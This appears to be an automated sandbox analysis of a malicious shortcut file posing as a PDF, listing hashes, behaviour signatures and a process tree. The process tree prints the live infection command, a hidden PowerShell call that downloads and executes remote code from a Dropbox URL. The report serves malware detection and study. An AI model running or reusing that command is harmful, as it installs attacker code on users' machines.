Analysis
-
max time kernel
14s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
19/11/2024, 12:15
Static task
static1
Behavioral task
behavioral1
Sample
2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnk
Resource
win10v2004-20241007-en
General
-
Target
2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnk
-
Size
3.0MB
-
MD5
b13b2313a1ad80566d583eb7e3f57584
-
SHA1
c230467b0e68a503d07434b83243715b18eaac4a
-
SHA256
cb3e629a63bab6dbfb2f79aac1aa49b90b8aa6aada8da087c2f51c02e9503c6a
-
SHA512
dcb31fe8204603821a916b4efebf867d89c4fe1e22952753190513b073984415e702f32c2c8927333611ffc94cdfe539dd425483b8c23cd4c9b6f057c370aebb
-
SSDEEP
24:88iJVDjC7GYPMR9JBty+/DCiyUDd0N1dZ8KqddNXuHY8junsJkFThm:882DETS9JrpAqd0NWdLXuHHeN
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3020 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3020 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2060 wrote to memory of 3032 2060 cmd.exe 30 PID 2060 wrote to memory of 3032 2060 cmd.exe 30 PID 2060 wrote to memory of 3032 2060 cmd.exe 30 PID 3032 wrote to memory of 3020 3032 cmd.exe 31 PID 3032 wrote to memory of 3020 3032 cmd.exe 31 PID 3032 wrote to memory of 3020 3032 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\2024_11_11_Product advertising hotpoint.pdf.lnk.download.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c PowerShell -WindowStyle Hidden -Command "Iex (irm 'https://fc8g7ejc3m.dl.dropboxusercontent.com/scl/fi/s/e?rlkey=vlr9zditnsugtc2yh5yr7p84m')"2⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -WindowStyle Hidden -Command "Iex (irm 'https://fc8g7ejc3m.dl.dropboxusercontent.com/scl/fi/s/e?rlkey=vlr9zditnsugtc2yh5yr7p84m')"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
-